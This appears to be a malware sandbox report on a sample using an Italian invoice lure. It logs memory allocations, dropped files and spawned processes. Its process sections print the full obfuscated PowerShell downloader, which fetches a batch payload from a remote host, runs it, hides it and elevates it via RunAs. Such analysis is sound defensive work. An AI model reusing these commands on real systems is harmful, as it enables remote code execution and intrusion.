NtProtectVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71482000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02642000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02781000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02782000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02643000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02644000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02677000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f2b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02662000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02675000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02645000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02930000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02646000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02663000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02664000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02665000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02666000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02667000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02668000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02669000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029dd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029de000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029df000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05010000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05011000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:40 a.m.	process_identifier: 2212 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05012000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\ProgramData\Fattura_IT9032003.bat

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (6 events)

cmdline	powershell.exe -nologo -noprofile -WindowStyle hidden -exec bypass -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwBOAEUAVAAtAEYAcgBhAG0AZQBXAG8AcgBrAC0AeAA2ADQALwBOAEUAVAAvAHIAYQB3AC8AbQBhAGkAbgAvAE4ARQBUAEYAcgBhAG0AZQB3AG8AcgBrAC4AegBpAHAAJwAsACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAE4ARQBUAEYAcgBhAG0AZQB3AG8AcgBrAC4AegBpAHAAJwApADsAIABFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABOAEUAVABGAHIAYQBtAGUAdwBvAHIAawAuAHoAaQBwACcAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwAJwA=
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function neH($EVB, $XkX){[IO.File]::WriteAllBytes($EVB, $XkX)};function RwI($EVB){if($EVB.EndsWith((qQr @(5830,5884,5892,5892))) -eq $True){rundll32.exe $EVB }elseif($EVB.EndsWith((qQr @(5830,5896,5899,5833))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $EVB}elseif($EVB.EndsWith((qQr @(5830,5893,5899,5889))) -eq $True){misexec /qn /i $EVB}else{Start-Process $EVB}};function FYF($neH){$oKw=(qQr @(5856,5889,5884,5884,5885,5894));$fMO=(Get-ChildItem $neH -Force);$fMO.Attributes=$fMO.Attributes -bor ([IO.FileAttributes]$oKw).value__};function kME($eoN){$kYq = New-Object (qQr @(5862,5885,5900,5830,5871,5885,5882,5851,5892,5889,5885,5894,5900));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$XkX = $kYq.DownloadData($eoN);return $XkX};function qQr($Yfu){$LIz=5784;$WDo=$Null;foreach($NrK in $Yfu){$WDo+=[char]($NrK-$LIz)};return $WDo};function QCr(){$DqQ = $env:ProgramData + '\';$RgpGMb = $DqQ + 'image.png';If(Test-Path -Path $RgpGMb){Invoke-Item $RgpGMb;}Else{ $VVOBCF = kME (qQr @(5888,5900,5900,5896,5899,5842,5831,5831,5889,5830,5889,5882,5882,5830,5883,5895,5831,5836,5900,5902,5840,5836,5898,5859,5831,5889,5893,5881,5887,5885,5830,5896,5894,5887));neH $RgpGMb $VVOBCF;Invoke-Item $RgpGMb;};;;$IfJAdDAhOV = $DqQ + 'Fattura_IT9032003.bat'; if (Test-Path -Path $IfJAdDAhOV){RwI $IfJAdDAhOV;}Else{ $dIxLH = kME (qQr @(5888,5900,5900,5896,5842,5831,5831,5833,5833,5838,5830,5834,5832,5835,5830,5833,5841,5830,5841,5839,5831,5833,5831,5854,5881,5900,5900,5901,5898,5881,5879,5857,5868,5841,5832,5835,5834,5832,5832,5835,5830,5882,5881,5900));neH $IfJAdDAhOV $dIxLH;RwI $IfJAdDAhOV;};FYF $IfJAdDAhOV;;;}QCr;
cmdline	"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\Fattura_IT9032003.bat" am_admin
cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo F"
cmdline	powershell -Command "Start-Process -Verb RunAs -FilePath '"C:\ProgramData\Fattura_IT9032003.bat"' -ArgumentList 'am_admin'"
cmdline	powershell.exe -ExecutionPolicy UnRestricted function neH($EVB, $XkX){[IO.File]::WriteAllBytes($EVB, $XkX)};function RwI($EVB){if($EVB.EndsWith((qQr @(5830,5884,5892,5892))) -eq $True){rundll32.exe $EVB }elseif($EVB.EndsWith((qQr @(5830,5896,5899,5833))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $EVB}elseif($EVB.EndsWith((qQr @(5830,5893,5899,5889))) -eq $True){misexec /qn /i $EVB}else{Start-Process $EVB}};function FYF($neH){$oKw=(qQr @(5856,5889,5884,5884,5885,5894));$fMO=(Get-ChildItem $neH -Force);$fMO.Attributes=$fMO.Attributes -bor ([IO.FileAttributes]$oKw).value__};function kME($eoN){$kYq = New-Object (qQr @(5862,5885,5900,5830,5871,5885,5882,5851,5892,5889,5885,5894,5900));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$XkX = $kYq.DownloadData($eoN);return $XkX};function qQr($Yfu){$LIz=5784;$WDo=$Null;foreach($NrK in $Yfu){$WDo+=[char]($NrK-$LIz)};return $WDo};function QCr(){$DqQ = $env:ProgramData + '\';$RgpGMb = $DqQ + 'image.png';If(Test-Path -Path $RgpGMb){Invoke-Item $RgpGMb;}Else{ $VVOBCF = kME (qQr @(5888,5900,5900,5896,5899,5842,5831,5831,5889,5830,5889,5882,5882,5830,5883,5895,5831,5836,5900,5902,5840,5836,5898,5859,5831,5889,5893,5881,5887,5885,5830,5896,5894,5887));neH $RgpGMb $VVOBCF;Invoke-Item $RgpGMb;};;;$IfJAdDAhOV = $DqQ + 'Fattura_IT9032003.bat'; if (Test-Path -Path $IfJAdDAhOV){RwI $IfJAdDAhOV;}Else{ $dIxLH = kME (qQr @(5888,5900,5900,5896,5842,5831,5831,5833,5833,5838,5830,5834,5832,5835,5830,5833,5841,5830,5841,5839,5831,5833,5831,5854,5881,5900,5900,5901,5898,5881,5879,5857,5868,5841,5832,5835,5834,5832,5832,5835,5830,5882,5881,5900));neH $IfJAdDAhOV $dIxLH;RwI $IfJAdDAhOV;};FYF $IfJAdDAhOV;;;}QCr;

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Dec. 7, 2022, 9:40 a.m.	show_type: 0 filepath_r: powershell.exe parameters: -ExecutionPolicy UnRestricted function neH($EVB, $XkX){[IO.File]::WriteAllBytes($EVB, $XkX)};function RwI($EVB){if($EVB.EndsWith((qQr @(5830,5884,5892,5892))) -eq $True){rundll32.exe $EVB }elseif($EVB.EndsWith((qQr @(5830,5896,5899,5833))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $EVB}elseif($EVB.EndsWith((qQr @(5830,5893,5899,5889))) -eq $True){misexec /qn /i $EVB}else{Start-Process $EVB}};function FYF($neH){$oKw=(qQr @(5856,5889,5884,5884,5885,5894));$fMO=(Get-ChildItem $neH -Force);$fMO.Attributes=$fMO.Attributes -bor ([IO.FileAttributes]$oKw).value__};function kME($eoN){$kYq = New-Object (qQr @(5862,5885,5900,5830,5871,5885,5882,5851,5892,5889,5885,5894,5900));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$XkX = $kYq.DownloadData($eoN);return $XkX};function qQr($Yfu){$LIz=5784;$WDo=$Null;foreach($NrK in $Yfu){$WDo+=[char]($NrK-$LIz)};return $WDo};function QCr(){$DqQ = $env:ProgramData + '\';$RgpGMb = $DqQ + 'image.png';If(Test-Path -Path $RgpGMb){Invoke-Item $RgpGMb;}Else{ $VVOBCF = kME (qQr @(5888,5900,5900,5896,5899,5842,5831,5831,5889,5830,5889,5882,5882,5830,5883,5895,5831,5836,5900,5902,5840,5836,5898,5859,5831,5889,5893,5881,5887,5885,5830,5896,5894,5887));neH $RgpGMb $VVOBCF;Invoke-Item $RgpGMb;};;;$IfJAdDAhOV = $DqQ + 'Fattura_IT9032003.bat'; if (Test-Path -Path $IfJAdDAhOV){RwI $IfJAdDAhOV;}Else{ $dIxLH = kME (qQr @(5888,5900,5900,5896,5842,5831,5831,5833,5833,5838,5830,5834,5832,5835,5830,5833,5841,5830,5841,5839,5831,5833,5831,5854,5881,5900,5900,5901,5898,5881,5879,5857,5868,5841,5832,5835,5834,5832,5832,5835,5830,5882,5881,5900));neH $IfJAdDAhOV $dIxLH;RwI $IfJAdDAhOV;};FYF $IfJAdDAhOV;;;}QCr; filepath: powershell.exe	1	1	0
CreateProcessInternalW Dec. 7, 2022, 9:40 a.m.	thread_identifier: 1716 thread_handle: 0x00000088 process_identifier: 1844 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell.exe -nologo -noprofile -WindowStyle hidden -exec bypass -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwBOAEUAVAAtAEYAcgBhAG0AZQBXAG8AcgBrAC0AeAA2ADQALwBOAEUAVAAvAHIAYQB3AC8AbQBhAGkAbgAvAE4ARQBUAEYAcgBhAG0AZQB3AG8AcgBrAC4AegBpAHAAJwAsACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAE4ARQBUAEYAcgBhAG0AZQB3AG8AcgBrAC4AegBpAHAAJwApADsAIABFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABOAEUAVABGAHIAYQBtAGUAdwBvAHIAawAuAHoAaQBwACcAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwAJwA= filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Dec. 7, 2022, 9:40 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (5 events)

Data received
Data received	F
Data received	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